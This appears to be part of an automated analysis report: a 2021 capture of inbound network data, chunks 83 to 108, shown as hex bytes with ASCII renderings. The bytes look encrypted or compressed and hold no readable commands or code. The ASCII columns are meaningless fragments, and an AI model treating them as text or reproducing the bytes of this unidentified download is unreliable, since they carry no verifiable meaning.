2021-11-25 15:51:21 UTC	83	IN	Data Raw: 08 d6 32 1f 98 ef 16 4f 44 e4 51 a8 cd b5 1b 1e 8b e0 6e ad d4 5b 40 97 e9 18 68 8d e2 45 a3 7a d3 60 f2 9f 9a 3f a2 23 6c 7c d8 80 5a 06 99 87 f2 52 0e b2 40 89 89 1d 8c 6a 8f 9c 66 37 0b 0b 3e d7 58 e1 c4 ac 31 f5 30 6f 0c 51 00 82 40 18 c4 b1 a3 af 59 89 9a 32 08 ac f4 c4 a6 2e 63 e0 7e 43 62 b1 d5 82 85 52 93 72 85 f3 dd db 5a e8 8c 89 8a 8b 8e 2d 92 1d 0a 1c 3a 43 3a ca e8 42 db d1 5c 93 2c 94 17 2f e0 55 6f 1a 98 44 7c 68 dc ad 38 3f 92 14 13 d1 cf 8e 06 43 4e f8 1e 4c 42 3f 2e 41 7f 31 94 0f e1 f5 52 84 e7 7d dc b1 52 c7 1d fb bc 3d e6 29 f7 72 e7 c4 af 70 af 2b fb 4a af ac 97 8e 21 ed 8b 4f 5c 7f a5 46 86 40 21 e6 64 b1 99 c3 7a aa 8d de 50 f5 97 65 c4 4b 5e 70 eb f2 66 b5 15 e9 91 5d 7b 38 68 b7 4e ff ee c5 27 e4 5f e4 0e 58 ed ca 03 d4 2c 50 da Data Ascii: 2ODQn[@hEz`?#l\|ZR@jf7>X10oQ@Y2.c~CbRrZ-:C:B\,/UoD\|h8?CNLB?.A1R}R=)rp+J!O\F@!dzPeK^pf]{8hN'_X,P
2021-11-25 15:51:21 UTC	84	IN	Data Raw: 95 bc 96 1b 19 a2 cf 4c f5 9e 3f bd 99 15 b6 9a fb e6 7f c2 93 30 20 1b 47 48 29 ff 86 71 11 aa 12 00 26 01 f6 0b 2d a7 a0 50 78 84 15 d5 dd b5 78 5d 22 a5 8c 4d 59 43 af 57 56 d6 90 37 1f 79 e4 52 1f e9 cf 31 85 4c 75 f0 23 86 99 ea 7a 69 07 8e 0e 9a 41 39 53 19 cb 39 b1 42 79 03 20 13 31 da 91 94 06 86 eb 64 24 08 55 30 37 be e9 fc 67 7b 85 ed 16 12 57 6a 8f e2 3b 54 0b 44 2e 49 40 14 50 4d ee 4a 9e 2e ff c5 10 51 4c 69 70 91 e1 ef 19 8b d8 98 3f ab 43 4a 6f 39 59 21 db d3 30 4a 8c f6 5b 72 4f 22 6f 14 6c f6 6a f1 c7 76 bb 5f 1c 43 58 88 ae 73 d2 d5 ce b4 ce bd 60 d6 90 6f 75 bd 92 16 76 5d 16 16 e8 56 3c 34 e7 ce b1 45 63 79 f3 91 53 10 ac d8 a3 9c 3b 73 e0 9d 7d d1 c7 26 6f 27 db 03 15 e8 67 20 87 c5 26 5e ad 44 66 af 86 66 69 0c 99 8e 1c bc 83 07 9e Data Ascii: L?0 GH)q&-Pxx]"MYCWV7yR1Lu#ziA9S9By 1d$U07g{Wj;TD.I@PMJ.QLip?CJo9Y!0J[rO"oljv_CXs`ouv]V<4EcyS;s}&o'g &^Dffi
2021-11-25 15:51:21 UTC	85	IN	Data Raw: 41 65 a0 2d 66 cc 82 77 d7 22 50 f1 e7 a4 c2 a5 9e 0f ea 4c 42 02 40 85 e1 3f af 4c cb 09 b5 a9 bc 07 31 83 f3 de ed 0c 56 d2 81 f8 22 23 d5 86 7b f5 75 9f 51 67 94 e0 6c 19 c6 1a d6 55 3b 3a 2a b6 c7 22 50 f5 65 ea 25 e9 f4 14 d8 4e 0b 20 fd 6b eb be 1b 4d 7d fe ba c6 a9 55 65 e6 34 4f 75 d7 27 67 e7 3c 10 59 6a 8c ea 2b 2e a0 09 16 ff b9 0c 9a 03 c3 f2 6a b2 ff 8a e7 3c 00 ba f1 e6 77 48 9c ab ff b1 40 98 31 64 7f 8b e7 ca 87 69 dc af 70 a2 25 d0 2f df 3d 06 8b db 3c 33 5f 89 0e 39 3d 43 1e ec 63 d7 00 44 0a 33 46 8b e0 ac 4f 9e 67 e1 36 03 da 9c d3 ba cf bd ea f2 95 ca 96 13 df 3d f8 22 6c 83 fa 7b d5 1a 80 40 1c 73 2c 2b cf db 0e a1 00 ba 0f df c0 8a 6b d1 79 e5 c3 14 55 0b 39 8b 15 8d ee 67 02 8a 59 5e 76 e8 78 aa 60 ae 3f 9b d5 43 6d dd 90 27 ef e2 Data Ascii: Ae-fw"PLB@?L1V"#{uQglU;:*"Pe%N kM}Ue4Ou'g<Yj+.j<wH@1dip%/=<3_9=CcD3FOg6="l{@s,+kyU9gY^vx`?Cm'
2021-11-25 15:51:21 UTC	87	IN	Data Raw: 5c 97 94 16 4e 91 fa 23 39 ed 1b f2 8c 26 60 a8 df d8 5a 44 c3 1e 6d 5d 27 3b fb 64 2d 9a 1a 4c 5e fd 85 cc 70 f7 9d 86 7a 64 5e 09 36 3b b8 ca be 34 88 68 4d 12 5a ef e6 78 bf e8 84 46 29 c9 0f e9 fb b5 8c c3 3c 17 a3 b9 44 c2 84 43 9e 3a de de 6d c7 40 2e 3a 08 92 e5 4b b0 c8 e6 23 dd 0a ac 29 1c 7a b1 dc 11 31 34 06 da 9f 2c f1 b6 c0 d6 ac e5 0d 89 0c 9f 49 1b 32 a9 61 67 01 07 c7 44 d4 9a 39 8f 6d 9f 93 93 f9 a8 ea 94 43 65 0b 28 14 ae 4d a0 37 a7 bc e2 2c 71 2f 58 aa 3a 0e a8 9a 05 31 bc 94 ea df a8 e8 1f 9f b4 2f de a5 17 93 84 7d ce a2 53 f6 e5 97 8a 56 e5 cb e8 e1 e8 43 b2 8f 95 b4 fe 33 53 e5 e2 76 a9 55 ae 47 67 1a 4f 47 ab 11 db dd ee 66 7a f4 3a 34 19 a0 05 20 18 70 78 54 0a 29 c6 6e ed fa 2a 16 49 b5 f9 b7 7d a9 31 8f 48 f4 fd 1e 74 cb 07 af Data Ascii: \N#9&`ZDm]';d-L^pzd^6;4hMZxF)<DC:m@.:K#)z14,I2agD9mCe(M7,q/X:1/}SVC3SvUGgOGfz:4 pxT)n*I}1Ht
2021-11-25 15:51:21 UTC	88	IN	Data Raw: 6b 6f b1 23 f7 a6 14 57 66 07 d0 ee e3 d6 cb 31 8e 1d ce 3a c8 c8 1b 98 92 0f a9 c6 c0 72 b4 7b 34 46 21 a6 82 f8 eb 7a 67 f4 49 72 51 20 7e 47 6b d1 34 36 fe 98 0d 17 39 a8 e3 c1 11 38 c8 82 f1 1e 00 ce ba cc b4 74 78 32 bf b3 c2 64 00 f2 98 13 d8 2c 1b fc 9d 51 d6 a7 ba 18 19 22 f6 92 90 a4 c3 e9 f0 09 d8 43 81 21 34 92 78 ad af b6 18 48 f2 3a f8 b5 43 54 5b 2d 7d de fe 27 ee 64 74 52 b4 6d a1 ec 67 b4 c9 0b db 3c 1e 48 90 83 ff 35 bc 15 af ec 52 fc 08 36 d9 b7 94 94 ed a2 5c 2b ae f3 00 9d 68 4e 9e 81 cd e1 c4 23 45 4c 21 e9 f7 a1 ae fb 7c 76 e7 1a b1 b7 72 6c d1 c0 f4 b0 f0 95 42 0c a0 03 37 87 49 40 fa c0 80 fb bd e4 d8 65 19 45 af 0c 2b 83 06 10 88 68 52 f7 2d d2 47 b3 4d 81 e1 3f 87 65 b7 54 cb 79 38 be e0 b4 aa 63 59 92 6b 37 0c ac 28 1f 4f 3f 4e Data Ascii: ko#Wf1:r{4F!zgIrQ ~Gk4698tx2d,Q"C!4xH:CT[-}'dtRmg<H5R6\+hN#EL!\|vrlB7I@eE+hR-GM?eTy8cYk7(O?N
2021-11-25 15:51:21 UTC	89	IN	Data Raw: 84 40 1a ff 86 df 5e dc 10 a6 2f b1 0e 89 19 f6 28 b9 4a 67 92 5d b1 a6 29 a2 c3 09 29 10 a9 a2 69 ac 99 5d ef d8 96 a2 10 e0 c5 5f d7 cf 3c 25 1e 60 94 88 88 8c 2f 0f 87 62 60 9e 3e 80 d4 11 52 b3 07 cb 07 3d 5e 88 65 8b 19 5f 41 c5 5b af 79 db e5 25 f8 2a f1 13 80 c5 a5 27 60 ce 8b 78 61 0b df cb 3c b0 ac ee 6d 0f d2 3a df 80 ce a3 33 4d 2b 0d c6 cb 9b da 39 c1 f8 2a 4f 07 72 8e 3a d4 72 1c b3 b4 63 ea 22 94 5f ec 7d fe 02 20 e6 81 e4 f0 69 05 08 a0 ad bd 95 2c 19 f8 16 ce 1d 10 a3 04 80 74 a7 fd e6 f3 e5 c2 3f a9 58 ed ff 69 0b 96 09 15 c1 bc d2 20 19 2d 2e 35 b2 c4 98 50 18 e7 cd 0f 1b e6 f5 a1 a7 a2 20 fb 6b c7 a0 0f ea 7f 5f a9 bf 8e a9 65 08 ac 91 30 be e2 7b 07 71 96 3d 93 ae f9 1f 07 c0 43 6c ba cf af 29 6a f0 63 30 05 34 a2 c4 b0 60 98 3d 94 5d Data Ascii: @^/(Jg]))i]_<%`/b`>R=^e_A[y%'`xa<m:3M+9Or:rc"_} i,t?Xi -.5P k_e0{q=Cl)jc04`=]
2021-11-25 15:51:21 UTC	91	IN	Data Raw: 0c 24 e6 ca c1 b9 e8 7f f1 17 ad 52 47 5b af 41 44 e6 7e 38 35 b6 bf ad c2 ab 5e 99 e2 5f e5 35 5b 1a 76 66 c6 b3 c0 dc 58 4c ca 60 6f 0a 29 7f d5 51 90 20 73 bd 9f 45 20 9b 88 69 7e 87 49 77 a7 29 d9 1b 48 ca bf 8c 02 2d 01 f1 06 35 aa 25 8a 66 be e9 41 5c a2 22 e0 31 be e9 f9 a9 d9 cf 69 b9 19 58 7c 94 6b a0 d0 f9 16 53 1f 71 c2 d2 32 ea d0 b6 75 24 01 4c c0 dd ee 80 74 df 35 44 d7 16 48 5f 92 51 31 b5 73 21 11 3d 32 8d e0 64 ec 85 30 5f e1 f6 14 58 07 c8 12 c7 1b f0 ef 0b 5a 9b 9d b0 fc 9c c5 66 d0 4f 7f ca 18 00 eb 76 66 8d 5b 14 ac 37 cc 06 b1 4b cf b0 95 97 2c 2c 12 af 55 f4 f7 fb 2d ae cd 0a 96 a9 c6 0f c7 e4 f6 1c 45 69 0c a0 06 8e 5b 52 68 83 f9 61 1f c6 7c bf d3 03 01 02 51 06 c4 1f f4 24 ef 0c 4a c1 fb 6b 89 e7 bf 67 36 1c e4 d5 1a 49 e2 7f 5f Data Ascii: $RG[AD~85^_5[vfXL`o)Q sE i~Iw)H-5%fA\"1iX\|kSq2u$Lt5DH_Q1s!=2d0_XZfOvf[7K,,U-Ei[Rha\|Q$Jkg6I_
2021-11-25 15:51:21 UTC	92	IN	Data Raw: 12 5e 2b 98 a2 2f 21 01 94 02 e1 db 4f 4b 42 7c 71 cf aa 8a fa f7 68 43 53 79 e8 e2 05 93 11 dc 62 6a 4f 02 b3 75 db 72 d5 80 45 27 4d 3e 92 1f 77 3f b3 c0 6d 67 af 73 1b c2 65 1b 17 57 88 75 7e 80 f7 a6 ca 0f c8 1b 15 38 df 5b a2 15 7a 64 20 49 ea 7e e5 c2 26 6b 87 cb ec 43 a0 38 3a 33 1b 4e c0 ed 92 eb a0 a5 be 3e 3c c6 c3 96 6b f5 8a 01 5e 87 63 e3 8f 0e b9 d2 b5 ca be 72 f7 6f c3 2c 13 11 b1 ae ab 6e 65 e5 f7 a7 a3 9d 13 6c 37 45 a7 9c 3a 35 8a 9d 5e 1a 7b f0 6a 4d a6 28 2f b6 f5 75 2e f9 ae f7 99 df b0 3f 93 94 f5 84 4a a7 a8 e6 3d aa 51 f8 03 05 42 57 8f 09 69 c5 dd df 01 8e 88 84 20 8d b8 63 08 a0 3f 21 11 5b 28 8f 70 f6 16 a7 69 04 83 cd e3 7d fe e6 47 66 75 45 51 7c 42 5e 5b 56 55 68 89 de 6f b8 06 5d 4d 7b c1 1f 34 63 99 e6 b3 40 fe 3c 85 f7 f9 Data Ascii: ^+/!OKB\|qhCSybjOurE'M>w?mgseWu~8[zd I~&kC8:3N><k^cro,nel7E:5^{jM(/u.?J=QBWi c?![(pi}GfuEQ\|B^[VUho]M{4c@<
2021-11-25 15:51:21 UTC	93	IN	Data Raw: 45 b4 bd c2 92 b6 f0 08 5c e4 db dc dc 62 97 60 be 5a d6 03 0d 3d 58 90 b2 ff 31 84 68 4f 1f 44 ef 25 da b2 2c 34 ca bf 60 a5 c3 eb 95 06 8d 6f 12 40 d3 2e b0 c6 3f 9e 2f 7b a9 d3 07 dc 60 fe ff cd 8f 92 de 51 17 3b f4 da ae c7 13 be 0c 03 37 80 7e d9 14 fc 3c 4a 29 32 0b 19 c1 a8 d3 8c 69 5a 02 0d 1a 42 d4 0a a8 7c 4c a4 dc f3 d5 2b 99 31 80 96 75 c5 f2 c0 ed f3 d4 79 ec ae fb ec 85 46 d2 82 7d 7e 7a f6 24 70 4b bb d9 29 a1 a0 78 15 3e 2b af a9 a2 16 75 eb f1 63 e9 02 f2 ec 68 10 59 68 b0 4a 70 55 46 e4 38 0e 63 59 7d 38 01 3d 41 2f 75 e2 4e c0 63 4f 90 91 e8 7f 32 19 5c 33 83 03 25 55 e8 9d 50 e7 5c 7e a4 14 5b 1c 76 d8 e5 4a 57 6f 13 6d 04 45 c4 fa 9c c8 7c 4a f5 93 ad c2 c6 0a 41 a2 0e df 30 79 d9 2c 28 1a da f7 4e 61 0a 9f 05 38 d4 55 4e 61 e8 92 12 Data Ascii: E\b`Z=X1hOD%,4`o@.?/{`Q;7~<J)2iZB\|L+1uyF}~z$pK)x>+uchYhJpUF8cY}8=A/uNcO2\3%UP\~[vJWomE\|JA0y,(Na8UNa
2021-11-25 15:51:21 UTC	95	IN	Data Raw: fc a8 da b5 86 7c ec 0c 0a a2 39 47 b6 69 33 64 81 91 73 d9 c0 e5 69 06 a6 c2 bf d4 ac 30 04 ad a4 57 d6 a8 74 a2 0c 40 07 91 97 24 5f 09 c2 bb d9 2b 3c 17 7c a7 5e e7 d2 5b b1 42 e3 c6 03 02 58 d1 20 89 42 d2 b4 f1 50 f9 21 e1 da 44 70 a4 24 53 dc 57 ca 89 85 07 86 45 52 c2 29 95 27 e7 a0 d3 99 89 e4 4b d4 98 8e 21 fd 70 17 f1 d1 36 97 b5 dc 66 97 69 c9 ba fe bd 63 6b c4 7a f8 17 70 93 88 86 5b 81 c8 7c 7a 4d b0 bb de 6d 82 7e 57 99 f4 b2 f3 55 52 e7 28 0d 96 3d 1a 76 3d 58 f5 28 20 dd e7 d5 dc 37 24 67 89 d1 2e f8 02 0b 13 7e 7c 20 8b 8e a5 ab e1 c8 ed 02 a4 85 fb 2a 1a ec 9d 53 69 94 fe 73 8d e4 71 27 a5 19 38 0b 25 4f 72 1f cc 7f 2f 34 3f a7 a9 cd 8a 34 9e da 97 8e bc ec 9b 33 c0 74 4a 26 d0 b2 c8 8f 1b b1 0b a0 07 08 50 09 91 a5 a5 aa 4a 4c 91 d4 f3 Data Ascii: \|9Gi3dsi0Wt@$_+<\|^[BX BP!Dp$SWER)'K!p6fickzp[\|zMm~WUR(=v=X( 7$g.~\| *Sisq'8%Or/4?43tJ&PJL
2021-11-25 15:51:21 UTC	96	IN	Data Raw: 31 6e 1b c9 fe e1 ca b4 c1 1c 86 94 21 d0 83 f5 2b ac 43 d9 73 c2 c2 9c 00 73 d3 3c c5 05 a0 8e 80 51 c2 35 07 38 83 cd 88 f8 f4 e1 ca 87 c7 14 0e ee 29 a6 2d 3b 9d 41 d8 f8 f5 6e 94 3a 0b 24 ec 8e f4 00 8e 25 d2 20 1f 0e 02 28 aa 2c e5 dd 2f cd 91 de 02 7b aa 2c 48 d5 bc 9d f4 73 c2 d5 8f 8c da a1 ca 79 cf 9f 27 fd 41 3e da f7 08 46 56 0f bc 01 5d 63 a4 1a 2f 90 ff df 52 a8 32 37 a0 db 99 1d 87 43 29 84 92 6b a5 ae 5c 77 cc 62 86 63 5d e2 4f 1d 0b 20 84 c9 1a 70 e2 f1 03 07 06 01 06 50 03 2d 19 3c 0a ff bb 60 9b 33 dc e7 25 ef d9 8c 6f df 2b c0 6c 48 ab 1c 76 58 d8 23 af c8 6f 53 70 5c 80 82 e5 46 43 a2 7b 5a f8 b3 73 ba d7 cf e3 80 99 74 19 41 ba a2 c4 cd 30 95 72 14 5f f0 95 b0 f0 54 ff 11 1b c1 a5 9d 38 c6 3e 2d 61 ac ac ef cc 72 4e c0 79 31 70 95 b4 Data Ascii: 1n!+Css<Q58)-;An:$% (,/{,Hsy'A>FV]c/R27C)k\wbc]O pP-<`3%o+lHvX#oSp\FC{ZstA0r_T8>-arNy1p
2021-11-25 15:51:21 UTC	97	IN	Data Raw: f9 af a3 cd 05 bd 37 df 3f ac dd 69 3c 81 6f cb e9 b2 ca 8a 5e 1e e2 0c 7f 89 d7 1f 40 15 66 13 3f b0 90 fd b7 76 de d4 fe d6 fe 3c 2e eb 95 5a 18 58 51 74 21 7a 3c 21 e7 c7 2b 1a a4 60 1d ef 6a 2f 45 48 45 a6 77 41 37 3b 76 40 ac 28 5d 86 6f 80 e7 28 61 81 22 c4 4a 2d 22 cc c8 15 ca da 3c ce ef 05 7f 4e 71 da 0d 16 b1 2a a4 a3 2c 1c 96 36 c2 c6 ae f9 97 6e b1 0e a5 aa e6 41 ce 56 c4 da 5f 1b fc 00 6f 7e 7e 46 e6 b2 2d 5c 9a 07 db c3 12 52 ce 5e 66 18 48 f2 8a 02 b5 42 d4 30 f5 2c 1b 4a fe ad c1 8f 19 96 71 6e a1 a1 49 2f b3 ae d6 01 ca 75 36 9a 99 09 1c 90 e6 c5 2e 07 36 c6 67 d9 a1 29 7a b9 d8 94 30 03 67 ea 78 60 93 6b 29 ad a0 5c 2b 07 a4 a1 ea cf 03 35 be 10 46 e7 35 a2 92 1b 67 92 09 d5 54 14 58 e1 f3 9d ba fb 03 d4 e0 c5 02 6d 3d 35 12 d7 b2 4c 9a Data Ascii: 7?i<o^@f?v<.ZXQt!z<!+`j/EHEwA7;v@(]o(a"J-"<Nq*,6nAV_o~~F-\R^fHB0,JqnI/u6.6g)z0gx`k)\+5F5gTXm=5L
2021-11-25 15:51:21 UTC	99	IN	Data Raw: 19 32 ff 87 1f 10 45 2a 2e 0b df cb 3c d5 d7 2e 83 02 9c 87 fc 30 04 36 95 2d 16 77 f8 85 6a 20 83 b2 53 6a a0 1a 40 b2 2c 52 18 b7 49 f2 9d 17 44 d1 3f 50 0e 68 ba c7 eb 00 06 4c f1 e3 f4 11 2a bd d9 dc 52 cf 3e 2b 4d ec d6 3d 54 4f 46 29 ff 08 34 07 0a d6 05 09 b7 38 ad 5f 13 ed 16 2c 11 4c 50 e1 3e c0 78 c1 f6 a9 60 68 4b 74 67 18 a5 b2 70 33 6c 27 dd 22 bb 52 4e cb d0 50 e8 49 8b fc ab 58 ab 6e 42 e2 99 61 de b4 04 03 33 ba 59 af b7 40 d1 30 0b 8b 6b dc b5 8f 58 e9 f9 94 17 32 37 b9 fb 8e 25 5f 22 9f 39 85 45 52 7e c7 9a 42 5e 92 17 ff 6c d5 14 c7 88 f7 f0 da 3c f1 65 fd 90 0b 38 f2 9b 39 5d 44 31 72 a7 46 56 6f c1 55 df 5d e8 b8 78 bf 62 b5 d4 2e c4 94 99 8d e8 d3 35 0d 21 76 a8 05 3e be 74 fe 81 fd b4 f0 9b a3 a4 a8 cc 9f d8 21 09 76 ab 19 18 71 12 Data Ascii: 2E.<.06-wj Sj@,RID?PhLR>+M=TOF)48_,LP>x`hKtgp3l'"RNPIXnBa3Y@0kX27%_"9ER~B^l<e89]D1rFVoU]xb.5!v>t!vq
2021-11-25 15:51:21 UTC	100	IN	Data Raw: ed 6c 0e 39 ed 77 1a 75 80 7f 7b 05 5b 64 ec a2 62 16 aa e3 21 98 79 fc 7e 42 42 11 e0 a3 c2 6a 9b 80 fc fe b4 5c 24 37 fe 18 0b 50 c8 3d 06 b9 43 9a 4a 2c f1 13 bf 7b 7c 93 9b 97 45 50 85 36 17 f1 88 4a 19 44 cc 44 0b 05 d3 23 2a 03 fc 64 67 24 3c 4b 4c ea cf ae a3 91 7b 7a d3 40 cd aa 3c d4 94 88 f8 02 62 b3 fa 85 a5 88 53 60 61 6b 7d 4a 32 14 d7 a0 d7 f8 7e d0 07 8d c1 5a d9 d3 d4 f9 a4 48 42 61 d4 f8 34 14 63 64 1e a8 fe cb ef c4 c6 03 29 ba 61 a2 ec 1e e6 2f 92 17 fd 35 4b 89 60 82 e1 e5 c8 ff 9d 10 c9 45 18 b4 7a 86 7b b5 1d eb 5f 83 e3 40 c7 13 ae fe 3a 58 e0 82 88 3e 43 7a 05 0e 42 f4 3e cc 71 ea e0 1d 73 a7 c2 ee b6 ac 46 d3 fb 22 59 3a eb 14 bf e9 93 ff 3e ea 93 94 86 45 8c 86 db 3b 4a 04 1b 06 a2 b6 82 42 42 3e da 65 b4 ce 5e 76 e5 06 01 ea 24 Data Ascii: l9wu{[db!y~BBj\$7P=CJ,{\|EP6JDD#*dg$<KL{z@<bS`ak}J2~ZHBa4cd)a/5K`Ez{_@:X>CzB>qsF"Y:>E;JBB>e^v$
2021-11-25 15:51:21 UTC	101	IN	Data Raw: 75 6d ee 9c 98 dc 52 5d d9 d4 18 9b 8b 53 b5 9b 14 94 32 a2 a3 54 44 09 15 6d a5 5c 2c ca 8a db 40 d9 92 c5 20 c0 9e d0 15 16 4c 63 37 d5 11 a8 de 5d 96 1c b0 dc de 36 cb 07 0f 75 26 d1 5b b4 ed 5a d7 88 3f 33 68 f7 60 cf 49 4b 7c 4e 78 c5 9d 14 74 a5 92 12 a5 4e 77 db d8 9f 0c a7 3b bb 8b 6d 05 33 bc e2 79 ea 44 86 64 50 c4 99 78 f2 62 68 00 b0 2b 82 73 64 ff 4a c8 81 2f 76 d3 87 ff 99 86 45 52 fb 09 ae 50 12 1a c9 1a fe aa 45 1a bf f8 20 4b cc 22 69 65 51 a1 91 98 ff 7d 0f 66 8d 5f 13 52 7f 95 a5 bb 57 69 c8 b5 88 07 a4 df d2 14 df 5a b3 e9 29 97 86 9e 06 2c 17 f6 16 d0 2a e5 8b ad 20 12 5b 23 0b 46 e4 b7 14 f0 a6 b3 c7 59 19 0c af 75 32 62 85 02 a8 75 1c 9d 48 fe e7 2f b8 66 07 b0 89 f1 20 75 e2 ab 31 8a 3b 68 6a 81 c2 78 b4 6d 64 3f 02 b0 c7 cf a6 11 Data Ascii: umR]S2TDm\,@ Lc7]6u&[Z?3h`IK\|NxtNw;m3yDdPxbh+sdJ/vERPE K"ieQ}f_RWiZ),* [#FYu2buH/f u1;hjxmd?
2021-11-25 15:51:21 UTC	103	IN	Data Raw: bc e5 83 da 79 ee 60 70 be e0 b8 b4 ae 4b 97 b2 c5 e4 b4 36 0c 92 22 6a 37 af 5d 74 25 00 cc 61 43 9b 23 5a 3d 44 30 12 f9 a4 b5 16 ab 3a 0c e2 6a 6e 92 1a a9 a6 3a 88 51 e0 18 ef 3d ab 63 f2 d4 a0 d1 a8 b8 77 30 11 59 e7 8a 87 26 6a ba 5f 49 58 a5 c2 33 be 47 54 77 4f 39 4a d1 09 28 e4 0a 4b 52 3f 47 5c 28 ce 3d 56 49 4a 61 34 a1 a9 f7 a0 3c 24 6f be eb ae 29 f7 3a a6 a5 15 ca 37 8e 4e ef 69 3f 93 ed 97 93 73 42 e6 ba 0a 98 6d a6 95 b2 2d 93 9e a6 26 2d 0e c6 63 42 4a d1 4d 82 ae 26 a9 11 17 4d 76 ad 8d e1 4c 46 20 2e e5 97 fe 0f e1 c1 8f 19 56 27 fc bf 14 68 84 77 48 3e da df 25 08 37 83 c0 d7 c8 75 52 fc 0e 59 e8 3a 0b f9 9e 3f 41 e3 51 8e f4 2a 11 eb c1 fb 3a 34 83 6e e9 29 99 bc e4 a5 b1 c2 da 04 7c 4d 4d be cd 49 49 70 9d 59 13 e5 cb e1 f6 21 fc f5 Data Ascii: y`pK6"j7]t%aC#Z=D0:jn:Q=cw0Y&j_IX3GTwO9J(KR?G\(=VIJa4<$o):7Ni?sBm-&-cBJM&MvLF .V'hwH>%7uRY:?AQ*:4n)\|MMIIpY!
2021-11-25 15:51:21 UTC	104	IN	Data Raw: f3 48 c0 5b 28 e2 b8 68 36 d5 44 d9 ad ca 1b ac a7 96 3f a3 48 d4 31 74 45 03 0e 51 7e a8 c8 23 e1 20 92 19 3f b2 47 c5 8d 0b 77 54 91 15 53 b1 2b 1b 00 c1 9c 5e de d5 9d 4a 4f 96 08 8a a9 84 19 3d 7c c0 1c 37 4b 08 12 66 80 75 56 7e a8 63 0b d8 4f 3b 29 0c 67 4b 00 ba f9 ac dc b9 67 02 5e f7 93 7f 27 e7 c1 2a 8e e1 3c c9 36 3d a6 ab b5 ed ba 7d 8b ad 50 f8 23 0a 15 f0 92 77 dc a8 63 c3 27 08 5f 7d f2 66 bc 5f 26 6a 83 f5 0d 70 48 1d c3 1b 0f 26 76 5b 19 f4 97 60 b9 12 6b 3b ac 56 ae 82 ad 69 33 79 36 1b fe 3f 92 86 dc e7 7b ba 67 55 db b8 fb 80 a4 43 cc 6f 34 33 65 3c 13 e7 c0 1c 96 93 68 b1 df e1 24 21 e0 52 fe c5 4a 72 68 87 cf 35 4c 39 d5 1e 76 6d a1 2c e1 e3 d6 ad 6e a0 74 4f bd 16 49 b5 50 de 64 8c 5b e4 a1 80 d6 5a 13 83 73 cd 91 e1 74 61 3d a0 32 Data Ascii: H[(h6D?H1tEQ~# ?GwTS+^JO=\|7KfuV~cO;)gKg^'*<6=}P#wc'_}f_&jpH&v[`k;Vi3y6?{gUCo43e<h$!RJrh5L9vm,ntOIPd[Zsta=2
2021-11-25 15:51:21 UTC	105	IN	Data Raw: 93 0e 10 c3 92 6b 35 50 03 3a dc 32 31 85 fe f5 2f 8c 8f 59 63 75 3e bb 63 35 bf 9e b9 4d af a9 6c 5a 51 e2 40 97 b9 80 a9 54 51 4b df 5c 00 cd 7a 68 c1 1c 99 93 ab d4 3a b2 3d ec e5 a3 59 38 bb 52 f5 d1 bf 58 1b bf 8f 53 f5 73 7f 3b eb 7f f8 19 fa 9b 4d f4 1c e1 82 5c 12 5b 16 f4 38 04 bb 65 ed 14 63 39 b6 c4 28 2b 1f eb 0d 19 f0 69 34 3d a6 1c 7f 91 b9 a1 a6 18 ad b5 73 24 61 33 65 61 9f 25 1a a6 9a 32 0b 2e 41 43 3e 24 63 e8 6e 35 46 b5 73 c6 29 a1 93 a5 ee 0e d7 25 d8 c3 1e 74 9e 38 ed 0d 27 0b 0b 28 18 4f 40 ad 5d 04 29 64 60 90 1a 4e fa 5e 80 26 60 99 61 1c 47 ab 30 04 5c 74 9a 3c 1b 75 7c 9f 5c 7c 25 4f 7f 48 db 2f ec 49 44 da 9a 49 85 32 07 04 42 33 9f 56 88 e7 28 f4 2c 2b 9b bc 70 2c f5 7d 76 6a 86 7a 0d 27 df e2 4d e0 50 7c b5 16 c2 a9 65 0b 63 Data Ascii: k5P:21/Ycu>c5MlZQ@TQK\zh:=Y8RXSs;M\[8ec9(+i4=s$a3ea%2.AC>$cn5Fs)%t8'(O@])d`N^&`aG0\t<u\|\\|%OH/IDI2B3V(,+p,}vjz'MP\|ec
2021-11-25 15:51:21 UTC	106	IN	Data Raw: 30 54 ea e6 7c 43 f0 a9 a3 53 15 73 18 c6 8b 03 3d 76 62 8c 56 8f 7a 40 24 35 c5 8b e1 c8 72 20 17 75 e8 fa 5a 5e 46 d3 3b 5d ab 52 06 4c d5 a0 d9 ca 12 c6 d8 50 6e a1 a5 53 63 d0 49 a0 a2 23 eb c3 e8 64 33 10 a8 50 c8 44 cd fe e4 22 12 5a ed 62 10 b4 8c f3 e1 f6 26 3d 16 8d dc 55 9e 27 e6 8e 7d 4a 21 6c 8a e9 1f 00 e6 4d 7d cd 84 dc a8 2e 5e a6 24 67 4f a7 64 87 f3 07 21 d2 59 d7 1c 43 ff 57 97 39 b4 11 ea c9 ca 71 cc 9b b6 c5 1a c2 dd a7 0e 5e ad bf 72 a0 de 6b e0 e3 7c ac a4 46 da a5 a3 3f e3 22 c7 1d f0 8e f7 90 18 df 25 18 58 d2 b5 4b d4 29 cf de d9 27 de b4 ef d6 7d a4 a5 5b 52 7c 2a 55 64 72 f4 4f 2e f9 71 e4 6b ba 0d 6a 4a 87 c2 96 09 1c f7 0d 90 15 f7 a4 10 bc 10 60 ed f1 e9 51 74 2c 02 5d 17 f4 11 d4 95 c4 8c e9 f9 a6 ec 3e 79 d9 a9 53 7c da 11 Data Ascii: 0T\|CSs=vbVz@$5r uZ^F;]RLPnScI#d3PD"Zb&=U'}J!lM}.^$gOd!YCW9q^rk\|F?"%XK)'}[R\|*UdrO.qkjJ`Qt,]>yS\|
2021-11-25 15:51:21 UTC	108	IN	Data Raw: b2 40 b3 10 1c e6 74 a7 42 c7 dd 26 02 5b 61 00 8e f9 b8 2d ae c7 25 dc 52 e9 62 14 04 cd bc 94 31 6a d9 11 37 d0 0a 3d 4d a2 1e c7 2a 22 65 16 42 45 18 b2 63 07 39 5a 84 4c 2b ff 24 26 9b 47 4c c5 f2 5c 95 39 d5 c9 b7 7d 21 0f d7 a4 c0 19 2a 10 51 4c 44 17 8f 16 fb 7f ea 59 58 dc 6d 7c a6 dc 55 65 ec 16 77 37 d1 97 5a 04 52 f1 14 37 01 0f 56 76 10 4e ff 8a 55 8c 03 00 13 54 b5 88 2c 1a 42 2b 8a 5c 04 3b b5 42 e6 75 db 4f 9d f9 16 53 e8 f1 2b ff 0d ce f1 73 35 a9 a9 b9 19 35 db 41 a4 91 04 27 8a 0f 54 0a e0 ad 1c be 99 81 c5 98 86 8c c1 1e a6 6f f4 7b 1d fb b1 ac 0b 1a 3e 24 db 8f 95 8e 29 75 3f fd 74 44 8e e1 30 55 98 f4 46 34 e1 8c 97 79 d2 54 15 c5 af bc 16 44 29 67 6c 42 3b cc 6f c5 03 df 2f d7 db 2d ca 